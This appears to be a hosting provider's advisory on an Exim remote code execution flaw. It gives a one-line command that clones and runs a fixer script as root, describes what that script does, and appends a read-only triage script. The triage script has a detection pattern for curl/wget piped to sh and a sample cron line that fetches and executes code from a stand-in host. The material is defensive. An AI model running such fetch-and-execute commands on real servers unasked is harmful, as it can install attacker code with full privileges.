Exim Vulnerability


CRITICAL: Your attention and action are required to avoid being hacked

Attention to all VPS and dedicated server customers! A critical vulnerability has been detected that affects all customers who use VestaCP, cPanel, ISP and who set up a web server.

To avoid being hacked, carry out the following instructions carefully on your VPS or server.

If you do not know how to do it, tell us that you need help, but it’s crucial that it gets done.

If you are using CentOS as your operating system:

yum install git && git clone https://github.com/Abelohost/exim-rce-quickfix.git && cd exim-rce-quickfix && bash exim_rce_fixer.sh

If you are using Debian or Ubuntu as your operating system:

apt install git && git clone https://github.com/Abelohost/exim-rce-quickfix.git && cd exim-rce-quickfix && bash exim_rce_fixer.sh

What the script does for you:

1. Depending on the operating system installed on the server:

  • On CentOS 7: updates Exim and reinstalls curl.
  • On CentOS 6: updates Exim from the EPEL test repository (release to regular repositories is expected 11-12.06) and reinstalls curl.

2. Checks for the infection on the server.

2a. If there is no infection, the script completes its function.

2b. If there are traces of a viral script in the /etc folder, it does the following:

  • stops cron;
  • kills the process started by the virus script;
  • stops the curl, wget and sh processes 3 times (the virus runs them on a schedule);
  • clears all emails from the mail queue (it’s difficult to differentiate infected emails from harmless ones, so the entire queue needs to be removed);
  • allows the deletion of files where malware is detected;
  • deletes these malware files;
  • removes the autostart task in /etc/rc.local;
  • removes the attacker’s keys from the SSH keys;
  • starts cron again;
  • then immediately reboots the server.
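
A read-only check for the traces listed above (scheduled curl/wget piped to sh, an autostart entry in /etc/rc.local, unfamiliar SSH keys), useful for seeing what is on the server before a script that empties the mail queue and reboots is run. This is an added example, not part of exim_rce_fixer.sh or the original advisory; the function names, the grep pattern and the sample tree are assumptions made for illustration.

```shell
#!/usr/bin/env bash
# Added example: read-only triage. It prints findings and changes nothing.
# Pass a root directory to inspect a mounted disk image or a test tree.

# Cron and rc.local lines that fetch with curl/wget and pipe the result to a shell.
find_fetch_exec() {
    local root f
    root="${1:-}"; root="${root%/}"
    for f in "$root"/etc/crontab "$root"/etc/cron.*/* "$root"/var/spool/cron/* \
             "$root"/var/spool/cron/crontabs/* "$root"/etc/rc.local; do
        [ -f "$f" ] || continue
        # A '#' anywhere before the match means the line is commented out and skipped.
        grep -HnE '^[^#]*(curl|wget)[^#]*\|[[:space:]]*(ba)?sh([[:space:]]|$)' "$f" || true
    done
    return 0
}

# Every authorized SSH key as "file: type comment", to compare with the keys you issued.
list_ssh_keys() {
    local root f
    root="${1:-}"; root="${root%/}"
    for f in "$root"/root/.ssh/authorized_keys "$root"/home/*/.ssh/authorized_keys; do
        [ -f "$f" ] || continue
        awk -v f="$f" '!/^[ \t]*(#|$)/ {
            for (i = 1; i <= NF; i++)
                if ($i ~ /^(ssh-|ecdsa-|sk-)/) { print f ": " $i " " $(i + 2); break }
        }' "$f"
    done
    return 0
}

# Constructed sample tree for trying the checks offline (not real indicators).
make_sample_tree() {
    local t
    t="$(mktemp -d)"
    mkdir -p "$t/etc/cron.d" "$t/root/.ssh"
    printf '%s\n' '# nightly backup' '0 3 * * * root /usr/local/bin/backup.sh' > "$t/etc/crontab"
    printf '%s\n' '*/5 * * * * root wget -q -O - http://example.invalid/x | sh' > "$t/etc/cron.d/sample"
    printf '%s\n' '#!/bin/sh' '# curl http://example.invalid/y | sh' 'exit 0' > "$t/etc/rc.local"
    printf '%s\n' 'ssh-ed25519 AAAAC3constructed admin@example' > "$t/root/.ssh/authorized_keys"
    echo "$t"
}

# Inspect the live system only when asked: bash triage.sh --live
if [ "${1:-}" = "--live" ]; then find_fetch_exec /; list_ssh_keys /; fi
```

A hit from find_fetch_exec is a line to review by hand, not proof of infection; list_ssh_keys cannot tell which keys are the attacker's, it only makes every entry visible.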

Please open a ticket if you have any questions. We will remove the infection for free.